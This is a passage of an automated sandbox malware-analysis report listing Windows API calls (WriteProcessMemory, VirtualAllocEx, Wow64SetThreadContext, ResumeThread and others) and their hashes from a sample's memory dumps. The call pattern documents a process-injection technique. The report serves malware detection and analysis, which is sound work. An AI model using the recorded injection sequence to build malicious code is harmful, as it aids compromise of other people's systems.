              • Snapshot File: hcaresult_0_2_2970000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: Create
              • String ID:
              • API String ID: 2289755597-0
              • Opcode ID: f367dd917ff0452e907b6fa5ce6f720497100bfcd830deb657119bc29f119c75
              • Instruction ID: 73167ab3bf5d8b65cdf51cacd4d84ca9b6103ed9c05c38e06b79654c6950a6df
              • Opcode Fuzzy Hash: f367dd917ff0452e907b6fa5ce6f720497100bfcd830deb657119bc29f119c75
              • Instruction Fuzzy Hash: 1F41B2B1C00619CFDB24CFAAC984B8EBBF5BF49704F64806AD408AB255DB756946CF90
              APIs
              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0749D218
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: MemoryProcessWrite
              • String ID:
              • API String ID: 3559483778-0
              • Opcode ID: 96493eeb4b968fc3badc542424aa65d64591a826390bb751ed9409c5cacab2e0
              • Instruction ID: f5b7876d4d61f4c0877be158fd5d407981042641a880c9cd5ebe0f556109af18
              • Opcode Fuzzy Hash: 96493eeb4b968fc3badc542424aa65d64591a826390bb751ed9409c5cacab2e0
              • Instruction Fuzzy Hash: CF2124B59003599FCB10CFAAC885BDEBBF5FF48310F10882AE959A7250C7789944CFA4

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1825 749d180-749d1d6 1827 749d1d8-749d1e4 1825->1827 1828 749d1e6-749d225 WriteProcessMemory 1825->1828 1827->1828 1830 749d22e-749d25e 1828->1830 1831 749d227-749d22d 1828->1831 1831->1830
              APIs
              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0749D218
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: MemoryProcessWrite
              • String ID:
              • API String ID: 3559483778-0
              • Opcode ID: d5a3f2a783bbcde5cd45aee4f97f909cd21b0a5b39355514639abff8ac8009e5
              • Instruction ID: b5c9df49e1a67f00eac083d405cd6ab898d875c2ef25fc97bcb6db1f46b76958
              • Opcode Fuzzy Hash: d5a3f2a783bbcde5cd45aee4f97f909cd21b0a5b39355514639abff8ac8009e5
              • Instruction Fuzzy Hash: 9F2137B59002199FCF00CFA9C985BDEBBF1FF48310F10842AE519A7251C7749555CFA4
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0297D5C6,?,?,?,?,?), ref: 0297D687
              Memory Dump Source
              • Source File: 00000000.00000002.1700878260.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2970000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: bd621b35ecf494a19f04cc564000c3fbdb46060f9f2cf885783db8eee663eba4
              • Instruction ID: 044a3f74dc1085b3f3baf962aaa5825239d7448b9900a9917e9089e4c60ca227
              • Opcode Fuzzy Hash: bd621b35ecf494a19f04cc564000c3fbdb46060f9f2cf885783db8eee663eba4
              • Instruction Fuzzy Hash: D521E6B5900348DFDB10CF9AD584AEEBBF4EF48310F14845AE918A7310D374A940CFA4
              APIs
              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0749D2F8
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: MemoryProcessRead
              • String ID:
              • API String ID: 1726664587-0
              • Opcode ID: bc23093e62854801be2bb5c5b3edcd57f9c96577404a026e9c41ac5f2664c5b2
              • Instruction ID: c16b006632203620cae5d1198d50c5e0ac977b9dc6e65037f224e273d034ab60
              • Opcode Fuzzy Hash: bc23093e62854801be2bb5c5b3edcd57f9c96577404a026e9c41ac5f2664c5b2
              • Instruction Fuzzy Hash: AF2134B6D002599FCB10CFA9C980BEEBBF1FF48320F10882AE519A7250D7789545CFA0
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0297D5C6,?,?,?,?,?), ref: 0297D687
              Memory Dump Source
              • Source File: 00000000.00000002.1700878260.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2970000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: ccb4e47cda2b5ea7e610ff9c9cb72657a9232fb06cae00b631ac80c83369c400
              • Instruction ID: 1cf43e1c9ab7428ba3a76c59b79674c74af8d9af66fbaf870df0837944c0fa66
              • Opcode Fuzzy Hash: ccb4e47cda2b5ea7e610ff9c9cb72657a9232fb06cae00b631ac80c83369c400
              • Instruction Fuzzy Hash: 7021B3B59002589FDB10CF9AD984ADEBBF8FB48314F14841AE958A7350D374A944CFA5
              APIs
              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0749D2F8
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: MemoryProcessRead
              • String ID:
              • API String ID: 1726664587-0
              • Opcode ID: d331bf4256a8beb0732e6d6226e1383be66760e654bacee72fd323341cfe59bf
              • Instruction ID: 9f3ac9874d5586a1604d3652930f60b52ec832a856d9ac426d65fa24c0411aba
              • Opcode Fuzzy Hash: d331bf4256a8beb0732e6d6226e1383be66760e654bacee72fd323341cfe59bf
              • Instruction Fuzzy Hash: 302114B1D002599FCB10DFAAC880AEEBBF5FF48320F10842AE559A7250C7789944CBA4
              APIs
              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0749D06E
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: ContextThreadWow64
              • String ID:
              • API String ID: 983334009-0
              • Opcode ID: f01abed220488d5d22119083cf27b7ab22a891cc2819e2d5cf21a36bfdb8cbdd
              • Instruction ID: 09ecc205d953cf15d5a92bd074dd6cfdcd2964c2c687a251d427d94bff58538d
              • Opcode Fuzzy Hash: f01abed220488d5d22119083cf27b7ab22a891cc2819e2d5cf21a36bfdb8cbdd
              • Instruction Fuzzy Hash: DA2118B1D002098FDB10DFAAC485BEEBBF4EF88324F14842AD559A7241D7789945CFA5
              APIs
              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0749D06E
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: ContextThreadWow64
              • String ID:
              • API String ID: 983334009-0
              • Opcode ID: b83af40c6ce72c377719d0f510eb6dc9e5b87c200011b866b6d801dac9e3b828
              • Instruction ID: 51b888e87cd4479471f41f00a2b53e82c70d615323e804200197d79ada212a53
              • Opcode Fuzzy Hash: b83af40c6ce72c377719d0f510eb6dc9e5b87c200011b866b6d801dac9e3b828
              • Instruction Fuzzy Hash: 772138B1D00209CFDB10DFA9C585BEEBBF4EF88314F14842AD459A7241C7789945CFA4
              APIs
              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0297B401,00000800,00000000,00000000), ref: 0297B612
              Memory Dump Source
              • Source File: 00000000.00000002.1700878260.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2970000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: LibraryLoad
              • String ID:
              • API String ID: 1029625771-0
              • Opcode ID: e566ab5dc3bebb9f0700cea6c68b8bea147e71c6b0afad83092643112921d314
              • Instruction ID: cbb8fc7cab5ccd0b3df3289906b4456d85aed792e0d8dda8d2a860a93453023d
              • Opcode Fuzzy Hash: e566ab5dc3bebb9f0700cea6c68b8bea147e71c6b0afad83092643112921d314
              • Instruction Fuzzy Hash: EF1114B69003488FDB10CF9AC444ADEFBF4EB48324F14842AD519A7210C375A545CFA4
              APIs
              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0749D136
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: b5055c39e688c0f3278e73f8a62d736a5ba703712ccb5a5343513b3a6c9ade70
              • Instruction ID: 00038be19981e7c044497db3b058bf229fbc4e43e12827a9a118a3bf1876249b
              • Opcode Fuzzy Hash: b5055c39e688c0f3278e73f8a62d736a5ba703712ccb5a5343513b3a6c9ade70
              • Instruction Fuzzy Hash: 591126B29002499FCB10DFAAC845BDEBFF5EB88320F10842AE559A7250C775A544CFA4
              APIs
              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0297B401,00000800,00000000,00000000), ref: 0297B612
              Memory Dump Source
              • Source File: 00000000.00000002.1700878260.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2970000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: LibraryLoad
              • String ID:
              • API String ID: 1029625771-0
              • Opcode ID: daaf17fe1d482ba04dff1f55f5e394e737959274d585c7fffce3e3f6ef343009
              • Instruction ID: 01cdd5e74c762da97d709bbd3fa78aca8ae53f47791ba8bee85e0c6246d28f75
              • Opcode Fuzzy Hash: daaf17fe1d482ba04dff1f55f5e394e737959274d585c7fffce3e3f6ef343009
              • Instruction Fuzzy Hash: 9411F3B6D003498FDB10CF9AC944BEEFBF9EB48324F14842AE559A7210C379A545CFA4
              APIs
              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0749D136
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: aa1b54a18b84fd28d54f567add09b25958da1d1c45bd3cc298cf1167271c6b04
              • Instruction ID: 543b5da7ffaf8b88911dbd01419c9df46d47b3f71f01b387e59970cd11f86fde
              • Opcode Fuzzy Hash: aa1b54a18b84fd28d54f567add09b25958da1d1c45bd3cc298cf1167271c6b04
              • Instruction Fuzzy Hash: 301156B6900249CFCB10DFA9C945BDEBFF5EF88320F14881AD559A7250C735A544CFA4
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: ResumeThread
              • String ID:
              • API String ID: 947044025-0
              • Opcode ID: 46da298c0c4d956226e8cc29147014dd52fd724e54f39e3d30bdc7e85912c2af
              • Instruction ID: 4c06d6f40e2417260b6cedb6964e41003068994c745b1225b9bd9406f06098f0
              • Opcode Fuzzy Hash: 46da298c0c4d956226e8cc29147014dd52fd724e54f39e3d30bdc7e85912c2af
              • Instruction Fuzzy Hash: 5A1158B1D002498FCB20DFAAC445BDEFFF4EF88324F24842AD419A7240D774A944CBA4
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: ResumeThread
              • String ID:
              • API String ID: 947044025-0
              • Opcode ID: 56b372b016e9f4ee7ea6b9b908d69969adf7325ef8144a1603b2e35387833024
              • Instruction ID: 8eb9d54d62a8400f1cc8de4ba1c8c9fe4522106fb14cc01db5246a254a05ecde
              • Opcode Fuzzy Hash: 56b372b016e9f4ee7ea6b9b908d69969adf7325ef8144a1603b2e35387833024
              • Instruction Fuzzy Hash: 791125B19002498FCB20DFAAC4457DEFFF4EB88324F20842AD459A7250DB75A944CBA4
              APIs
              • GetModuleHandleW.KERNELBASE(00000000), ref: 0297B386
              Memory Dump Source
              • Source File: 00000000.00000002.1700878260.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2970000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: HandleModule
              • String ID:
              • API String ID: 4139908857-0
              • Opcode ID: c705d16c0636d15df15983e6132b1fe398369a6b6a072c43456d95efd0e75e6f
              • Instruction ID: 4fefff87cd48e7910e69c16ea0982b74a26affb89a15fbcb4991dfe238b47b26
              • Opcode Fuzzy Hash: c705d16c0636d15df15983e6132b1fe398369a6b6a072c43456d95efd0e75e6f
              • Instruction Fuzzy Hash: DA11DFB5D007498FCB14DF9AC444ADEFBF8AB88328F10846AD459A7210C375A585CFA5
              APIs
              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0749FB5D
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: MessagePost
              • String ID:
              • API String ID: 410705778-0
              • Opcode ID: 8c2f27513691a26d62891fbcb6251fe4024bdbfe583f94c49bd4fb605976f677
              • Instruction ID: b1e44dcc041da30756dd80413717a3ae615cb870335eda00a0aa5e9f171df4f4
              • Opcode Fuzzy Hash: 8c2f27513691a26d62891fbcb6251fe4024bdbfe583f94c49bd4fb605976f677
              • Instruction Fuzzy Hash: 0711F5B58003499FCB10DF9AD485BEEBFF8EB48310F10845AE558A7200D375A944CFA5
              Memory Dump Source
              • Source File: 00000000.00000002.1700129539.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_e3d000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f3fcb6fb83ff8fd004dddd6029baf4d923fa7a3c78eeef9e9903283c5793892b
              • Instruction ID: a053d95d6b0b92a61337410774579f7804fb389b040902e4695184aea9b56098
              • Opcode Fuzzy Hash: f3fcb6fb83ff8fd004dddd6029baf4d923fa7a3c78eeef9e9903283c5793892b
              • Instruction Fuzzy Hash: 01213771508240EFCB05DF14EDC8B27BF65FB98318F20C569E8095B256C336D856CBA1
              Memory Dump Source
              • Source File: 00000000.00000002.1700129539.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_e3d000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3d5fe7f6c16ff749fb6012b6e043bf18f9ba53723f70895e82c4af26e9c26e3c
              • Instruction ID: 754cb8568b403c4cd182a901b411dc7676a6b61f4fdea7e12c27543662cb4a10
              • Opcode Fuzzy Hash: 3d5fe7f6c16ff749fb6012b6e043bf18f9ba53723f70895e82c4af26e9c26e3c
              • Instruction Fuzzy Hash: 5A213771508204DFDB05DF14EDC8B2ABF65FB98328F20C169E9095B256C336E856CBA2
              Memory Dump Source
              • Source File: 00000000.00000002.1700236197.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_e4d000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 00b7f206f719da5e48fb2c444ad7e470da88c525b2aebfdc7c41623dd46eeb40
              • Instruction ID: 6536643e8ada61f01ab5b7063d48cf7e115563ec4f9ea71099230ec67ab213ab
              • Opcode Fuzzy Hash: 00b7f206f719da5e48fb2c444ad7e470da88c525b2aebfdc7c41623dd46eeb40
              • Instruction Fuzzy Hash: 63214971608200DFCB01DF14EDC0B26BBA5FB84318F20C66DE8095B361C3B6D846CA65
              Memory Dump Source
              • Source File: 00000000.00000002.1700236197.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_e4d000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ce9282064178758bc62402a70ecb47ee6d9f10896dd51401f164a95f04a30f73
              • Instruction ID: 2bd4ec3892e04f8fcea28390ad8970b9e78b11edf460b9306d494c8e297fb27b
              • Opcode Fuzzy Hash: ce9282064178758bc62402a70ecb47ee6d9f10896dd51401f164a95f04a30f73
              • Instruction Fuzzy Hash: 2B210471608200DFCB14DF14E9C4B26BFA6FB84318F20C56DD80A5B396C33AD847CA61
              Memory Dump Source
              • Source File: 00000000.00000002.1700236197.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_e4d000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6b94599b01788595bb2177a67f003f7a866502216f715daa2e07db1e370a68ef
              • Instruction ID: adb6b0bf64ec70dded88b1d22e990cdd1801fd421b2966916b7e00c5b5dbe626
              • Opcode Fuzzy Hash: 6b94599b01788595bb2177a67f003f7a866502216f715daa2e07db1e370a68ef
              • Instruction Fuzzy Hash: 7821837550D3808FCB02CF24D994715BF71EB46314F28C5EAD8498F2A7C33A980ACB62
              Memory Dump Source
              • Source File: 00000000.00000002.1700129539.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_e3d000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
              • Instruction ID: 5ef47d6b489b8f543017d49d86300702a16d40700cfbe5d93199277d323aa85b
              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
              • Instruction Fuzzy Hash: 9811E676504280DFCB16CF14E9C4B16BF71FB94328F24C6A9DC494B656C336D85ACBA1
              Memory Dump Source
              • Source File: 00000000.00000002.1700129539.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_e3d000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
              • Instruction ID: fccfd203ef65d855980b47aeefe8fe0bb93abf8b86b91b30d17630bd30eb301f
              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
              • Instruction Fuzzy Hash: 34110372404240CFCB12CF10E9C4B16BF71FB94328F24C2A9D8090B256C33AE85ACBA1
              Memory Dump Source
              • Source File: 00000000.00000002.1700236197.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_e4d000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
              • Instruction ID: 62537df0891861fb48ec09580f84bc6a283946371a911ed30dd4b22f9d164ef6
              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
              • Instruction Fuzzy Hash: C011BB75908280DFCB02CF50D9C4B15BBA1FB84318F24C6AAD8494B6A6C37AD81ACB61
              Memory Dump Source
              • Source File: 00000000.00000002.1704630207.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7480000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bf47e03c4b3b2196ba212dca2d36be4d2bc92fc9a95961787a84bb98d84cac78
              • Instruction ID: e46d7314dbc3b1b6deb6ba4f56ddb71137986b45aba3f2b347b9ec51a7f075e0
              • Opcode Fuzzy Hash: bf47e03c4b3b2196ba212dca2d36be4d2bc92fc9a95961787a84bb98d84cac78
              • Instruction Fuzzy Hash: BE015EB491425ADFCB11DFA4C4487EEBFF0AB07301F1844DAA464B72E2C7784A45DB55
              Memory Dump Source
              • Source File: 00000000.00000002.1704630207.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7480000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 054c8f6e27a1472df81a12d145d8878a9f5cd1c3d73efcb6178ddb95597487d2
              • Instruction ID: d2858e91c6944b2c0192a707ad68ad392244a2a4e6d00afd4c80c1a1acb672d7
              • Opcode Fuzzy Hash: 054c8f6e27a1472df81a12d145d8878a9f5cd1c3d73efcb6178ddb95597487d2
              • Instruction Fuzzy Hash: 62012CB4D04219DFCB54DFA5C808BFEBBF0AB4A301F0484AAA469B32A1D7B44A44DF54
              Memory Dump Source
              • Source File: 00000000.00000002.1703155717.00000000050C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_50c0000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d3ed7e0bc570795156885bc95d34eabb2ae852f5857d2162224d0766b46339a0
              • Instruction ID: 714c5f8ec2b1a3da1312d4b1adf67ad5c46bcc2ff9342c1f277a86a6e62780c0
              • Opcode Fuzzy Hash: d3ed7e0bc570795156885bc95d34eabb2ae852f5857d2162224d0766b46339a0
              • Instruction Fuzzy Hash: 4C1260B0422B468ED7208F65ED4E18D7EB1BBC5398B504209E2656F6E1DFBC114BCF4A
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 983afac40b8e04d06fc2bb7cbb83192d905570a74b352573c42670dc40974765
              • Instruction ID: 87357e1392516a8de61aa5711a8bdddf862cee10d8e17a6935147a300f55aac7
              • Opcode Fuzzy Hash: 983afac40b8e04d06fc2bb7cbb83192d905570a74b352573c42670dc40974765
              • Instruction Fuzzy Hash: C4E1C8B4E001198FDB14DFA9C5809AEFBF2FF89305F24816AD415A7356DB31A941CFA1
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e83eb545878c00f1456da30ca9721dc12370f007bf3278caf41a34ae3812539b
              • Instruction ID: c9ffb5b7a54ce3f0a63004be2c9653e9fdefdbab552d7617079af06d3e7daa65
              • Opcode Fuzzy Hash: e83eb545878c00f1456da30ca9721dc12370f007bf3278caf41a34ae3812539b
              • Instruction Fuzzy Hash: F6E1D7B4E001198FCB14DF99C6849AEBBF2FB89305F24C16AD415AB356DB31AD41CFA0
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7bd2c18c2c7bfd4c35103e6c9090045e0fa995d32483818d3a330e3bb77d69b7
              • Instruction ID: 7069789fc5e90408ec057f66804a9e21ea9fb5974ed97de4a988ea1d44d4772f
              • Opcode Fuzzy Hash: 7bd2c18c2c7bfd4c35103e6c9090045e0fa995d32483818d3a330e3bb77d69b7
              • Instruction Fuzzy Hash: A1E1EAB4E001198FDB14DFA9C6809AEBBF2FF89305F24916AD415A7356DB31AD41CFA0
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 18d6ba9997b18190713fd53ffcad2236d93ccf9c1c93029e9a62ad390c4cd8d8
              • Instruction ID: 50de2d8d9153eb251d2f54090cb8b4d35422b914037fb9b8eab840633acb6d58
              • Opcode Fuzzy Hash: 18d6ba9997b18190713fd53ffcad2236d93ccf9c1c93029e9a62ad390c4cd8d8
              • Instruction Fuzzy Hash: 1FE1E9B4E001198FCB14DFA9D5819AEBBF2FF89305F24816AD414AB356DB31AD41CF61
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a9ceb2f675c34c775fe7606daffcc40fea6035c94cb4bff4b596d6a136cccf3a
              • Instruction ID: cfcad7aac58f43a3467fb9792de0a2a605db59e062b943e7b544de4d5ccad66e
              • Opcode Fuzzy Hash: a9ceb2f675c34c775fe7606daffcc40fea6035c94cb4bff4b596d6a136cccf3a
              • Instruction Fuzzy Hash: 92E1B9B4E001198FDB14DFA9D5809AEBBF2FF89305F24C16AD414AB355DB31A941CFA1
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8b9a00e621be191c8e44e5ba0585c06d6cde92c14f8f57357eaa53008dcca2d7
              • Instruction ID: 19756d17738cb997ad04fc60d119b57a91e80ece1a4fbe224671d24d123a36e9
              • Opcode Fuzzy Hash: 8b9a00e621be191c8e44e5ba0585c06d6cde92c14f8f57357eaa53008dcca2d7
              • Instruction Fuzzy Hash: 7DD1EA31920B5A9ACB11EB64D990A9DF7B1FF95300F109B9AE00937615EB70AAC9CF41
              Memory Dump Source
              • Source File: 00000000.00000002.1700878260.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2970000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fbe07af77917a23e3bd594b8093f6bf22a6ede1e7f4a9520bade21f7a14531a5
              • Instruction ID: dc9db5f6aaba5a28372b3a29f2bbbd619fed15573aea66c47dbd09aaa0947f3a
              • Opcode Fuzzy Hash: fbe07af77917a23e3bd594b8093f6bf22a6ede1e7f4a9520bade21f7a14531a5
              • Instruction Fuzzy Hash: 57A17E32A10205CFCF15DFB4C9805AEBBB6FF84300B1585AAE805BB265DB75E946CF90
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
